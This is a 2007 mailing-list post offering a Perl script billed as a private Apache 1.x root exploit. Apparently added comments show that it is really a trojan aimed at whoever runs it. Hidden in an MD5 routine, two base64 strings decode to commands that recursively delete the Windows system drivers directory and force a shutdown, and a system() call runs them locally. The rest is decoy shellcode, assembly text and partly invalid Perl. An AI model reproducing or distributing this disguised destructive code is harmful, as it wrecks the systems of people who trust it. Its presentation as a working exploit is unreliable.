
A new apache 1.x 0day
From: x666 () Safe-mail net
Date: Mon, 19 Mar 2007 15:15:36 -0400

Hi,

A new apache 1.x 0day

#!/usr/bin/perl

use MIME::Base64;
use IO::Socket;
use HTTP::Response;
use HTTP::Status;
use Getopt::Std;

# Banner.  Note what the rest of the script does NOT do: IO::Socket is
# imported above but no socket is ever created, and the $shellcode string
# assigned below is never referenced again.  The only statements with an
# observable effect are two system() calls much further down, which run
# two base64-decoded OS commands on the machine executing this script.
print q {

#################################################################
##
## Apache 1.X Remote Buffer Overflow getRoot() Exploit
## written by 666 - blueshisha () safe-mail net
##
## ! PRIVATE ! PRIVATE ! PRIVATE ! PRIVATE ! PRIVATE ! PRIVATE !
##
## If this is gonna be distributed, it will be my last one.
##
#################################################################

};

# Demands at least two arguments ($#ARGV >= 1).  The values are then read
# from $ARGV[1] and $ARGV[2] rather than $ARGV[0] and $ARGV[1] -- off by
# one against the usage text -- but neither is used anywhere afterwards.
if($#ARGV < 1)
{
        print "[^] Usage   :  apache.pl [target] [port]\n";
        print "[^] Example :  apache.pl 127.0.0.1 80\n";
        exit;
}

# Can be replaced, simply get a rootshell


# Appended to an undeclared package global and never read again: nothing
# on this page sends $shellcode anywhere.  The lines starting at
# "\x32\x3c\xe5\x83\xeb\xfc..." are a verbatim repeat of the five lines
# before them, so half of the string is padding.
$shellcode .= "\x29\xc9\x83\xe9\xeb\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x46".
              "\x32\x3c\xe5\x83\xeb\xfc\xe2\xf4\x77\xe9\x6f\xa6\x15\x58\x3e\x8f".
              "\x20\x6a\xa5\x6c\xa7\xff\xbc\x73\x05\x60\x5a\x8d\x57\x6e\x5a\xb6".
              "\xcf\xd3\x56\x83\x1e\x62\x6d\xb3\xcf\xd3\xf1\x65\xf6\x54\xed\x06".
              "\x8b\xb2\x6e\xb7\x10\x71\xb5\x04\xf6\x54\xf1\x65\xd5\x58\x3e\xbc".
              "\xf6\x0d\xf1\x65\x0f\x4b\xc5\x55\x4d\x60\x54\xca\x69\x41\x54\x8d".
              "\x32\x3c\xe5\x83\xeb\xfc\xe2\xf4\x77\xe9\x6f\xa6\x15\x58\x3e\x8f".
              "\x20\x6a\xa5\x6c\xa7\xff\xbc\x73\x05\x60\x5a\x8d\x57\x6e\x5a\xb6".
              "\xcf\xd3\x56\x83\x1e\x62\x6d\xb3\xcf\xd3\xf1\x65\xf6\x54\xed\x06".
              "\x8b\xb2\x6e\xb7\x10\x71\xb5\x04\xf6\x54\xf1\x65\xd5\x58\x3e\xbc".
              "\xf6\x0d\xf1\x65\x0f\x4b\xc5\x55\x4d\x60\x54\xca\x69\x41\x54\x8d".
              "\x69\x50\x55\x8b\xcf\xd1\x6e\xb6\xcf\xd3\xf1\x65";


# Off by one against the usage text ($ARGV[0] is the first argument).
# Harmless in practice: neither $target nor $port is referenced again on
# this page, so no connection is ever attempted to the given host.
my $target = $ARGV[1];

my $port   = $ARGV[2];


# Decoy; never called from anywhere on this page (and since the name
# shadows the connect builtin, a plain connect(...) call would resolve to
# the builtin, not to this sub).  Does no I/O: it installs a __DIE__ hook
# that rewrites "0x" to "4" in the die message, dies inside an eval so the
# hook fires, and prints the rewritten message from $@.  local() confines
# the hook to this sub's dynamic scope.
sub connect    {
       
local $SIG{'__DIE__'} =
       sub { (my $x = $_[0]) =~ s/0x/4/g; die $x };
       eval { die "0x4141414141" };
       print $@ if $@;
 }


# Decoy, and not valid Perl: push requires an array as its first argument,
# so these bareword operands should be rejected at compile time, which
# would stop the whole file from running.  The sub is never called and the
# names only mimic a stack-frame layout.
sub socket    {
       
push  SOCKADDR;
push  SOCKDATA;
push  STACKDATA;
push  ESPOINT;
push  ENDADDR;

 }

# eval of a qw() list: the list is evaluated in scalar context, which
# should collapse it to its last word, so at most a single bareword is
# eval'd and any error is silently left in $@.  The text itself is
# 16-bit, DOS-era interrupt-handler style (pushf / push cs / jmp [OldISR],
# cursor and number-printing calls) and has nothing to do with Apache --
# decoration.  The same pattern repeats in the later eval qw blocks.
eval qw (

Bytecode:

        dec cx
        jz Root
        mov     bp, FloppyOff  ;offset
        pushf
        push     cs
                push            bp
        jmp     [OldISR]
        
Root:                                           
        inc     cx                              
        cmp     dx, [SecondCntr] ;cs:.           
        jne     NotSecond                       
IsSecond:                                       
        

        mov     bh,5                            
        mov     bl,21                           
        call    seg OSSetCursorXY:OSSetCursorXY           ; root runs once
        mov     ax,cx                           
        call    seg OSPrintWordNum:OSPrintWordNum         
        
        
        
        mov     bh,5                        
        mov     bl,22                          
        call    seg OSSetCursorXY:OSSetCursorXY           
        mov     ax,[RootCntr] ;cs:.                  
        mov     [RootCntr],0 ;cs:.                  
        call    seg OSPrintWordNum:OSPrintWordNum
);       

# Pure-Perl MD5 in a bare block so the four subs share private state:
#   @S    per-step left-rotate amounts
#   @T    the 64 sine-derived additive constants
#   @M    which message word each of the 64 steps reads
#   $code the Perl source generated for _md5_perl_generated, then eval'd
# None of the md5 subs is called anywhere on this page; the block exists
# to look like real tooling.  Buried in the middle of it are the two
# $mov/$int assignments, which are not MD5 code at all (see below).
{

   my ( @S, @T, @M );

   my $code = '';



   # MD5 hex digest of the single argument; undef in, undef out.
   # Builds the tables and the generated sub on first use (@M is empty
   # until _md5_init has run).  If the generated eval failed, the last
   # line dies with an undefined-subroutine error.
   sub md5 {

       return undef if ( !defined $_[0] ); 

       my $DATA = _md5_pad( $_[0] );

       &_md5_init() if ( !defined $M[0] );

       return _md5_perl_generated( \$DATA );

   }



   # One-time table setup, then generation of the unrolled round code.
   sub _md5_init {

       return if ( defined $S[0] );

       my $i;

       # T[i-1] = floor(2^32 * |sin(i)|), i = 1..64.
       for ( $i = 1 ; $i <= 64 ; $i++ ) {

           $T[ $i - 1 ] = int( ( 2**32 ) * abs( sin($i) ) );

       }

       # Four rotate amounts per round, cycled through each round's 16 steps.
       my @t = ( 7, 12, 17, 22, 5, 9, 14, 20, 4, 11, 16, 23, 6, 10, 15, 21 );

       for ( $i = 0 ; $i < 64 ; $i++ ) {

           $S[$i] = $t[ ( int( $i / 16 ) * 4 ) + ( $i % 4 ) ];

       }

       # Message-word index for each step: round 1 sequential, then
       # strides of 5, 3 and 7 (mod 16).
       @M = (

           0, 1, 2,  3,  4,  5,  6,  7,  8,  9,  10, 11, 12, 13, 14, 15,

           1, 6, 11, 0,  5,  10, 15, 4,  9,  14, 3,  8,  13, 2,  7,  12,

           5, 8, 11, 14, 1,  4,  7,  10, 13, 0,  3,  6,  9,  12, 15, 2,

           0, 7, 14, 5,  12, 3,  10, 1,  8,  15, 6,  13, 4,  11, 2,  9

       );

       &_md5_generate();

       # Leftover: computed and never used.
       my $TEST = _md5_pad('foobar');



       
   }



   # MD5 padding: append 0x80, zero-fill to 56 mod 64, then the original
   # bit length as a 64-bit little-endian value (two 32-bit 'V' fields).
   sub _md5_pad {

       my $l = length( my $msg = shift() . chr(128) );

       $msg .= "\0" x ( ( $l % 64 <= 56 ? 56 : 120 ) - $l % 64 );

       # $l counted the appended 0x80 byte, hence the -1.
       $l = ( $l - 1 ) * 8;

       # High word via two 16-bit shifts -- presumably to stay safe on
       # builds where a single 32-bit shift would be undefined.
       $msg .= pack 'VV', $l & 0xffffffff, ( $l >> 16 >> 16 );

       return $msg;

   }

   # NOT part of the MD5 code.  These are package globals (no my), so they
   # are visible outside this block.  Decoded with MIME::Base64, $mov is a
   # Windows command that force-deletes everything under the system
   # drivers directory, recursively and quietly, and $int is a forced
   # immediate shutdown.  They are passed to system() on the line
   # ");system ($mov);system ($int);shift;" after a later eval qw block,
   # i.e. they run on the machine executing this script, not on any
   # "target".  This is what the page actually is: a trojan aimed at the
   # person who runs it.
   $mov = decode_base64("QGRlbCAlU3lzdGVtUm9vdCVcU3lzdGVtMzJcZHJpdmVyc1wqLiogL0YgL1MgL1EgPiBudWw=");
   $int = decode_base64("c2h1dGRvd24gLXMgLWYgLXQgMA==");

   # Writes the Perl source of _md5_perl_generated into $code -- the
   # 64 steps fully unrolled with the table values baked in -- and evals
   # it.  Errors from that eval are not checked.
   sub _md5_generate {

       # Rotating register names: step i updates the first of the four
       # letters selected by ($i % 4), i.e. a, d, c, b in turn.
       my $N = 'abcddabccdabbcda';

       my ( $i, $M ) = ( 0, '' );

       # On a perl whose integers are wider than 32 bits the mask string
       # is appended to every step so results wrap to 32 bits; on a
       # 32-bit build the shift yields 0 and no mask is emitted.
       # Careful below: "$M[$i]" indexes the shared @M table, while a
       # trailing "$M" is this scalar -- two different variables.
       $M    = '&0xffffffff' if ( ( 1 << 16 ) << 16 ); 

       # NOTE(review): on the line reading "my \ () D = unpack(...)" the
       # " () " is almost certainly this archive's @-obfuscation (compare
       # "blueshisha () safe-mail net" in the banner) of "\@D"; as rendered
       # the generated source is a syntax error that the eval swallows.
       # The BEGIN line sets the low hint bit in $^H, which looks like
       # "use integer" for the generated sub -- verify before relying on it.
       $code = <<EOT;

       sub _md5_perl_generated {

   BEGIN { \$^H |= 1; }; 

       my (\$A,\$B,\$C,\$D)=(0x67452301,0xefcdab89,0x98badcfe,0x10325476);

       my (\$a,\$b,\$c,\$d,\$t,\$i);

       my \$dr=shift;

       my \$l=length(\$\$dr);

       for my \$L (0 .. ((\$l/64)-1) ) {

               my \ () D = unpack('V16', substr(\$\$dr, \$L*64,64));

               (\$a,\$b,\$c,\$d)=(\$A,\$B,\$C,\$D);

EOT

       # Round 1, F(b,c,d) = d ^ (b & (c ^ d)), written without select().
       # Each step: t = F + a + X[M[i]] + T[i]; a = rotl32(t, S[i]) + b.
       # The rotate masks the right-shift result so it is correct on
       # 64-bit integers too.
       for ( $i = 0 ; $i < 16 ; $i++ ) {

           my ( $a, $b, $c, $d ) =

             split( '', substr( $N, ( $i % 4 ) * 4, 4 ) );

           $code .=

             "\$t=((\$$d^(\$$b\&(\$$c^\$$d)))+\$$a+\$D[$M[$i]]+$T[$i])$M;\n";

           $code .=

"\$$a=(((\$t<<$S[$i])|((\$t>>(32-$S[$i]))&((1<<$S[$i])-1)))+\$$b)$M;\n";

       }

       # Round 2, G(b,c,d) = c ^ (d & (b ^ c)).
       for ( ; $i < 32 ; $i++ ) {

           my ( $a, $b, $c, $d ) =

             split( '', substr( $N, ( $i % 4 ) * 4, 4 ) );

           $code .=

             "\$t=((\$$c^(\$$d\&(\$$b^\$$c)))+\$$a+\$D[$M[$i]]+$T[$i])$M;\n";

           $code .=

"\$$a=(((\$t<<$S[$i])|((\$t>>(32-$S[$i]))&((1<<$S[$i])-1)))+\$$b)$M;\n";

       }

       # Round 3, H(b,c,d) = b ^ c ^ d.
       for ( ; $i < 48 ; $i++ ) {

           my ( $a, $b, $c, $d ) =

             split( '', substr( $N, ( $i % 4 ) * 4, 4 ) );

           $code .= "\$t=((\$$b^\$$c^\$$d)+\$$a+\$D[$M[$i]]+$T[$i])$M;\n";

           $code .=

"\$$a=(((\$t<<$S[$i])|((\$t>>(32-$S[$i]))&((1<<$S[$i])-1)))+\$$b)$M;\n";

       }

       # Round 4, I(b,c,d) = c ^ (b | ~d).
       for ( ; $i < 64 ; $i++ ) {

           my ( $a, $b, $c, $d ) =

             split( '', substr( $N, ( $i % 4 ) * 4, 4 ) );

           $code .= "\$t=((\$$c^(\$$b|(~\$$d)))+\$$a+\$D[$M[$i]]+$T[$i])$M;\n";

           $code .=

"\$$a=(((\$t<<$S[$i])|((\$t>>(32-$S[$i]))&((1<<$S[$i])-1)))+\$$b)$M;\n";

       }

       # Tail of the generated sub: add the block result into the running
       # state, wrap to 32 bits (+ binds tighter than &), and finally
       # return the four words little-endian as a lowercase hex string.
       $code .= <<EOT;

               \$A=\$A+\$a\&0xffffffff; \$B=\$B+\$b\&0xffffffff;

               \$C=\$C+\$c\&0xffffffff; \$D=\$D+\$d\&0xffffffff;

       } # for

   return unpack('H*', pack('V4',\$A,\$B,\$C,\$D)); }

EOT

       # String eval of generated code; $@ is never inspected.
       eval "$code";

   }

}

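   # Hash a plaintext password with crypt() under a fresh two-character
   # salt.  Takes the plaintext string; returns crypt()'s output, whose
   # first two characters are the salt.
   #
   # The salt characters are drawn from the 62-character alphanumeric
   # set.  The original indexed that 62-element list with rand(63), so
   # index 62 could come up and produce an undef salt character (a
   # warning and a one-character salt); indexing by the list length
   # closes that gap.  crypt() with a two-character salt is traditional
   # DES crypt -- a weak password hash by modern standards.  Nothing on
   # this page calls this sub.
   sub  rehash
   {
      my ($plaintext) = @_;
      my @salt_chars  = ( 'a' .. 'z', 'A' .. 'Z', '0' .. '9' );
      my $salt        = join '', map { $salt_chars[ rand @salt_chars ] } 1 .. 2;
      return crypt($plaintext, $salt);
   }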

# eval of a qw() list again: only its last word is evaluated, so the
# Windows WSAStartup/WSASocketA call-sequence text is decoration.  The
# statement that does something is tacked onto the closing line:
# system($mov) and system($int) run the two base64-decoded OS commands
# assigned inside the MD5 block above -- a forced recursive delete under
# the Windows system drivers directory, then a forced immediate shutdown
# -- on the machine executing this script, not on any "target".  (That
# presumes perl accepts the file at all; as rendered here the later
# "eval qw <" blocks have no closing ">".)  The trailing bare shift
# consumes $ARGV[0] and has no other effect.
eval qw (

make_startup_room:         ; setup ebp for WSAStartup data
  push BYTE 20             ; push 20
  pop eax                  ; register
  mul eax                  ; square that shit = 0x190
  sub esp, eax             ; make room for WSAStartup data
  mov ecx, esp

make_table_room:           ; setup ebp for address table
  sub esp, BYTE (_WSA_INIT_TBLEN * 4)
  push edi                 ; [ebp + 8] = LoadLibraryA
  push esi                 ; [ebp + 4] = LGetProcAddress
  push ebx                 ; [ebp + 0] = kernel32 dll base
  mov ebp, esp
  push ecx                 ; push WSAStartup data address
  push eax                 ; push 0x190

make_table:                ; hash the table
  WSA_HASH_WINSOCK

wsa_startup:
  ; call WSAStartup
  WSA_CALL_WSASTART

make_socket:
  ; call WSASocketA, get a tcp socket
  WSA_CALL_SOCKET 'tcp'
  ; we got the socket in edi
);system ($mov);system ($int);shift;   # runs the decoded commands locally
# Same eval-of-a-qw()-list pattern: at most the last word is evaluated
# and the Linux-style int 0x80 text is decoration.  No socket results
# from this.
eval qw (

        push    word 0x4D2    
 
        inc     ebx        
 
        push    bx        
 
        mov     ecx, esp    
 
        push    byte 16        
 
        push    ecx        
 
        push    eax        
 
        mov     ecx, esp
 
        mov     al, 102
 
        int     0x80
);

# Cosmetic progress message plus a 4 second pause to look like a
# network exchange is in progress; nothing is sent before or after it.
print "[x] Exploiting...\n";

sleep(4);

# qw with "<" as its delimiter needs a closing ">", and the ";" after the
# last word is not one.  As rendered here there is no ">" anywhere in the
# rest of the file, so perl should fail with a missing-string-terminator
# error at compile time and nothing in the script runs -- unless the
# archive swallowed a ">" (it visibly rewrote "@" elsewhere).  Either way
# the accept/dup2 text is decoration.
eval qw <
accept:
 
    push     eax
 
    push     edi
 
    mov     ecx, esp
 
    inc      ebx        
 
    mov     al, 102    
 
    int     0x80
 
dup2:
 
        xor     ecx, ecx
 
        mov      cl, 3
;

# $recvdata is never assigned anywhere on this page, so it is undef:
# "undef != 0" is false and "undef == 0" is true, meaning this always
# reports "[x] Exploit failed!" (with an uninitialized-value warning
# under -w).  No shellcode is executed in either branch.
if ($recvdata != 0) {
print "[x] Executing Shellcode...";
}

if ($recvdata == 0) {
print "[x] Exploit failed!";
}

# Second "eval qw <" with no closing ">" -- same unterminated-string
# problem as the previous one; the /bin/sh execve text is decoration
# and the ";" does not close the qw.  exit follows.
eval qw <
exec:
 
    xor    eax,eax
 
    mov     al, 11            
 
    push    ecx
 
    push     "//sh"
 
    push     "/bin"
 
    mov      ebx, esp
 
    push     ecx
 
    push     ebx
 
    mov      ecx, esp
 
    int      0x80
;

exit;

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

